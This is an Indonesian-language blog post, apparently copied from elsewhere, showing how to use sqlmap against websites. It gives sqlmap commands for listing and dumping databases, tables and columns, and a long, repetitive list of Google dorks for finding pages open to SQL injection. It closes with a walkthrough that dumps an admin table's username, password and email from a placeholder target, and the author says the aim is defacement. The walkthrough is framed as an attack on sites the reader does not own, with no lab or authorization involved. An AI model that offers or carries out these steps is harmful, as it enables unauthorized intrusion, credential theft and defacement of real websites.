Tuesday, August 18, 2020

Utilisasi SQLMap



Berikup Kutipan penggunaan SQLmap yang saya peroleh melalui browsing di internet




 

Berikut adalah beberapa command penting di SQLMAP

 

Untuk melakukan scanning terhadap Target [URL]

./sqlmap.py -u[url]

 

Untuk mendapatkan informasi database Target [URL]

./sqlmap.py -u[url] –dbs

 

Untuk mendapatkan informasi table di database Target [URL]

./sqlmap.py -u [url] –tables -D [database]

 

Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]

./sqlmap.py -u [url] –columns -T [table name] -D [databasename]

 

Untuk melakukan dump kolom, table dan database Target [URL]

./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]

 

Untuk melakukan dump spesifik kolom Target [URL]

./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]

 

 

Berikut Google Dork Strings untuk mempermudah dan menemukan website vurnerability atau yang rentan terhadap SQL injection :

 

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:index.php?catid=

inurl:news.php?catid=

inurl:index.php?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:ogl_inet.php?ogl_id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:aboutbook.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:pages.php?id=




perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

 

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

 

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

 

information_schema

my_db

 

langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa? mungkin feeling aja :-p

 

sekarang kita ketikkan lagi perintah ini :

 

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables

 

karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "/" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

 

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". Saya umpamakan table-table tersebut adalah sebagai berikut :

 

admin

members

item

 

nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini :

 

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns

 

lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama column nya :

 

ID

username

password

email_address

country

 

disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". Maka saya akan kembali mengetikkan perintah :

 

 ./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump

 

dan hasilnya saya mendapati sebagai berikut :

 

admin:123456:admin@target.com

 

ini artinya :

 

admin = username

123456 = password

admin@target.com = email_address